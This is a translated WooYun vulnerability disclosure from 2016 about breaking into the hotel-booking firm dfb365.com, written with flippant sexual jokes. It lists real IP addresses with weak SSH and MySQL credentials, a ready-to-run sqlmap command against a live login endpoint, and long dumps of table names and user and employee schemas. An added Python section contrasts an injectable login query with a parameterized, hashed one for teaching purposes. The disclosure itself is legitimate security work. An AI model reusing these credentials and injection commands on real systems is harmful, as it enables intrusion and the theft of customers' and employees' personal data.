Vulnerability summary
Defect ID: wooyun-2016-0188591
Title: A day trip through Dingfangbao's internal systems (multiple important systems, several hundred thousand user records, tens of thousands of merchant records, employee accounts, passwords included)
Affected vendor: dfb365.com
Author: 路淫甲
Submitted: 2016-03-24 21:30
Fixed: 2016-05-08 21:50
Published: 2016-05-08 21:50
Vulnerability type: successful intrusion event
Severity: High
Self-assessed Rank: 20
Status: vendor has confirmed
Source: http://www.wooyun.org; for questions or assistance contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2016-03-24: details sent to the vendor, awaiting the vendor's handling
2016-03-24: vendor has confirmed; details visible to the vendor only
2016-04-03: details disclosed to core white hats and relevant domain experts
2016-04-13: details disclosed to regular white hats
2016-04-23: details disclosed to intern white hats
2016-05-08: details disclosed to the public
Brief description:
Storm into Dingfangbao and catch Sora Aoi alive
Below begins the dream-chasing journey in search of Teacher Aoi...
Detailed description:
Systems involved: renaming, mail, cs, and so on
A series of issues leads straight into the intranet, exposing all kinds of user data
Problem IP
First up is an SSH weak password with root privileges, straight into the intranet
ssh://114.215.150.232:8200
admin admin
Port 3306 is reachable from the Internet, but the admin account holds little data, and root cannot connect remotely
mysql://114.215.150.232:3306
admin admin
The internal local MySQL is reachable with root\root
That leaks the tech department's mailboxes and passwords
Organizational structure:
There is no "Teacher Aoi" anywhere in the company org chart, so disappointing!!!
Project information:
Proof of vulnerability:
SQL injection:
http://cs.dfb365.com/user/login.action
http://115.28.131.8:8082/user/login.action
sqlmap.py -u "http://115.28.131.8:8082/user/dologin.action" --data="model.email=admin*&model.password=123123" --threads=10 --tables -D "dfb356db2"
The login form itself is the injection point, and once logged in every search box is an injection point as well
Assorted user tables
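The login endpoint above is injectable because the submitted email is spliced into the SQL text, so the field controls the query rather than just a value. The following is an added illustration, not code from the report or from dfb365: an in-memory SQLite stand-in for the report's employee table (column names email and password are taken from the sqlmap output; the pw_salt/pw_hash columns, the sample account admin@example.com and its password are constructed), with the string-built login query beside a parameterized one that verifies a salted PBKDF2 hash in code. How dfb365 actually stores passwords is not stated in the report; the hashed scheme here is the hardened choice, not a description of their system.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample credential; not taken from the report.
SAMPLE_EMAIL = "admin@example.com"
SAMPLE_PASSWORD = "S3cret!"


def _hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the stored value is never the plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the report's employee table with one constructed row.
    'password' holds plaintext so the vulnerable query can compare against it;
    'pw_salt'/'pw_hash' hold what the hardened login uses instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employee (email TEXT, password TEXT, pw_salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO employee VALUES (?, ?, ?, ?)",
        (SAMPLE_EMAIL, SAMPLE_PASSWORD, salt, _hash_password(SAMPLE_PASSWORD, salt)),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """The pattern behind the finding: user input concatenated into the query text,
    so a quote in the email field rewrites the WHERE clause."""
    sql = f"SELECT 1 FROM employee WHERE email='{email}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Parameterized lookup by email only; the password is checked in code against
    the salted hash with a constant-time comparison."""
    row = conn.execute(
        "SELECT pw_salt, pw_hash FROM employee WHERE email=?", (email,)
    ).fetchone()
    if row is None:
        # Hash anyway so an unknown account costs the same time as a wrong password.
        _hash_password(password, b"\x00" * 16)
        return False
    salt, stored = row
    return hmac.compare_digest(_hash_password(password, salt), stored)


# A quote plus an SQL comment: in the vulnerable query it ends the email literal and
# comments out the password condition; in the hardened one it is just an unknown email.
INJECTED_EMAIL = SAMPLE_EMAIL + "' -- "


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_correct": login_vulnerable(conn, SAMPLE_EMAIL, SAMPLE_PASSWORD),
        "vulnerable_injected": login_vulnerable(conn, INJECTED_EMAIL, "wrong"),
        "hardened_correct": login_hardened(conn, SAMPLE_EMAIL, SAMPLE_PASSWORD),
        "hardened_injected": login_hardened(conn, INJECTED_EMAIL, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The same placeholder discipline applies to the post-login search boxes the report mentions: every value that comes from the request goes in as a bound parameter, and the query text itself never contains user input. Note that parameterization stops the injection but does nothing about credentials stored in recoverable form; the second half of the fix is hashing with a per-user salt so a dumped table does not yield working passwords.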
[15:25:08] [INFO] resumed: 134
[15:25:08] [INFO] resumed: action
[15:25:08] [INFO] resumed: activity
[15:25:08] [INFO] resumed: activity_business_record
[15:25:08] [INFO] resumed: activity_code
[15:25:08] [INFO] resumed: activity_hotel
[15:25:08] [INFO] resumed: activity_weixin
[15:25:08] [INFO] resumed: advertisement
[15:25:08] [INFO] resumed: advertisement_sort
[15:25:08] [INFO] resumed: app
[15:25:08] [INFO] resumed: b_log
[15:25:08] [INFO] resumed: basic_hotel_report
[15:25:08] [INFO] resumed: charge_refund_record
[15:25:08] [INFO] resumed: circle
[15:25:08] [INFO] resumed: city
[15:25:08] [INFO] resumed: district
[15:25:08] [INFO] resumed: employee
[15:25:08] [INFO] resumed: group
[15:25:08] [INFO] resumed: hotel
[15:25:08] [INFO] resumed: hotel_access_token
[15:25:08] [INFO] resumed: hotel_account
[15:25:08] [INFO] resumed: hotel_addition
[15:25:08] [INFO] resumed: hotel_auto_sell
[15:25:08] [INFO] resumed: hotel_bill
[15:25:08] [INFO] resumed: hotel_bomment
[15:25:08] [INFO] resumed: hotel_contact_person
[15:25:08] [INFO] resumed: hotel_dictionary
[15:25:08] [INFO] resumed: hotel_excellent
[15:25:08] [INFO] resumed: hotel_group
[15:25:08] [INFO] resumed: hotel_profile
[15:25:08] [INFO] resumed: hotel_recommended
[15:25:08] [INFO] resumed: hotel_service_fee
[15:25:08] [INFO] resumed: hotel_spread
[15:25:08] [INFO] resumed: hotel_spread_report
[15:25:08] [INFO] resumed: hotel_spread_withdraw
[15:25:08] [INFO] resumed: hotel_topic
[15:25:08] [INFO] resumed: interior
[15:25:08] [INFO] resumed: interior_bak
[15:25:08] [INFO] resumed: ip_access_count
[15:25:08] [INFO] resumed: ip_restrict
[15:25:08] [INFO] resumed: k_action
[15:25:08] [INFO] resumed: k_link_role_action
[15:25:08] [INFO] resumed: k_link_user_hotel
[15:25:08] [INFO] resumed: k_link_user_role
[15:25:08] [INFO] resumed: k_role
[15:25:08] [INFO] resumed: k_user
[15:25:08] [INFO] resumed: link_activity_hotel
[15:25:08] [INFO] resumed: link_activity_order
[15:25:08] [INFO] resumed: link_activity_passport
[15:25:08] [INFO] resumed: link_emp_role
[15:25:08] [INFO] resumed: link_hotel_city
[15:25:08] [INFO] resumed: link_hotel_group
[15:25:08] [INFO] resumed: link_hotel_photo
[15:25:08] [INFO] resumed: link_hotel_service
[15:25:08] [INFO] resumed: link_order_charge
[15:25:08] [INFO] resumed: link_order_coupon
[15:25:08] [INFO] resumed: link_response_room
[15:25:08] [INFO] resumed: link_response_room_bak
[15:25:08] [INFO] resumed: link_role_action
[15:25:08] [INFO] resumed: link_room_photo
[15:25:08] [INFO] resumed: link_room_price
[15:25:08] [INFO] resumed: link_room_state
[15:25:08] [INFO] resumed: link_sale_hotel
[15:25:08] [INFO] resumed: link_user_activitycode
[15:25:08] [INFO] resumed: link_wf_biztable
[15:25:08] [INFO] resumed: link_wf_refuse
[15:25:08] [INFO] resumed: location_airport
[15:25:08] [INFO] resumed: location_circle
[15:25:08] [INFO] resumed: location_city
[15:25:08] [INFO] resumed: location_district
[15:25:08] [INFO] resumed: location_line
[15:25:08] [INFO] resumed: location_station
[15:25:08] [INFO] resumed: location_subway
[15:25:08] [INFO] resumed: locomotor_activity
[15:25:08] [INFO] resumed: locomotor_activity_summary
[15:25:08] [INFO] resumed: locomotor_banner_summary
[15:25:08] [INFO] resumed: locomotor_type
[15:25:08] [INFO] resumed: mail_user
[15:25:08] [INFO] resumed: online_user
[15:25:08] [INFO] resumed: order_main
[15:25:08] [INFO] resumed: order_main_bak
[15:25:08] [INFO] resumed: order_main_temp
[15:25:08] [INFO] resumed: order_request
[15:25:08] [INFO] resumed: order_request_bak
[15:25:08] [INFO] resumed: order_response
[15:25:08] [INFO] resumed: order_response_bak
[15:25:08] [INFO] resumed: order_time
[15:25:08] [INFO] resumed: order_tohotels
[15:25:08] [INFO] resumed: order_user_infos_temp
[15:25:08] [INFO] resumed: pay_way_temp
[15:25:08] [INFO] resumed: photo
[15:25:08] [INFO] resumed: pingpp_charge
[15:25:08] [INFO] resumed: played_bills
[15:25:08] [INFO] resumed: policy
[15:25:08] [INFO] resumed: policy_action_hotel
[15:25:08] [INFO] resumed: policy_condition_hotel
[15:25:08] [INFO] resumed: red_envelop
[15:25:08] [INFO] resumed: red_envelope_link
[15:25:08] [INFO] resumed: role
[15:25:08] [INFO] resumed: room
[15:25:08] [INFO] resumed: room_auto_sell
[15:25:08] [INFO] resumed: room_prices
[15:25:08] [INFO] resumed: room_prices_temp
[15:25:08] [INFO] resumed: sms_verify_code
[15:25:08] [INFO] resumed: sys_dict
[15:25:08] [INFO] resumed: t_hotel_btoc
[15:25:08] [INFO] resumed: t_hotel_irect_log
[15:25:08] [INFO] resumed: t_promotion_detail
[15:25:08] [INFO] resumed: t_promotion_staff
[15:25:08] [INFO] resumed: test_weixin
[15:25:08] [INFO] resumed: threepart_token
[15:25:08] [INFO] resumed: threepart_user
[15:25:08] [INFO] resumed: tor_business_city
[15:25:08] [INFO] resumed: tor_hotel_direct
[15:25:08] [INFO] resumed: user
[15:25:08] [INFO] resumed: user_access_token
[15:25:08] [INFO] resumed: user_account
[15:25:08] [INFO] resumed: user_account_history
[15:25:08] [INFO] resumed: user_credit
[15:25:08] [INFO] resumed: user_passport
[15:25:08] [INFO] resumed: user_passport_list
[15:25:08] [INFO] resumed: user_pay
[15:25:08] [INFO] resumed: user_push_token
[15:25:08] [INFO] resumed: user_spread
[15:25:08] [INFO] resumed: user_statistics
[15:25:08] [INFO] resumed: weixin_user
[15:25:08] [INFO] resumed: wf_advice
[15:25:08] [INFO] resumed: wf_def
[15:25:08] [INFO] resumed: wf_node
[15:25:08] [INFO] resuming partial value: wf_node_pers
............
Database: dfb356db2
Table: employee
[12 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| account | varchar(30) |
| email | varchar(60) |
| has_update | char(1) |
| hotel_id | bigint(20) |
| id | bigint(20) |
| is_del | char(1) |
| is_direct | char(1) |
| is_manager | int(1) |
| mobile | char(20) |
| name | varchar(100) |
| password | char(40) |
| status | char(1) |
+------------+--------------+
Database: dfb356db2
Table: user
[13 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| device_id | varchar(50) |
| device_type | varchar(20) |
| email | varchar(50) |
| imei | varchar(50) |
| login_time | datetime |
| open_id | varchar(50) |
| password | varchar(50) |
| phone_number | varchar(50) |
| register_time | datetime |
| score | int(11) |
| source_from | varchar(20) |
| user_id | bigint(20) |
| user_name | varchar(50) |
+---------------+-------------+
Still no "Teacher Aoi" to be found!!
Fix recommendation:
Not playing anymore
Copyright notice: please credit the source when reposting, 路淫甲@乌云
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-03-24 21:50
Vendor reply:
The vulnerability is being fixed; many thanks to 路淫甲 and WooYun. My contact: zhesheng.
Latest status:
None yet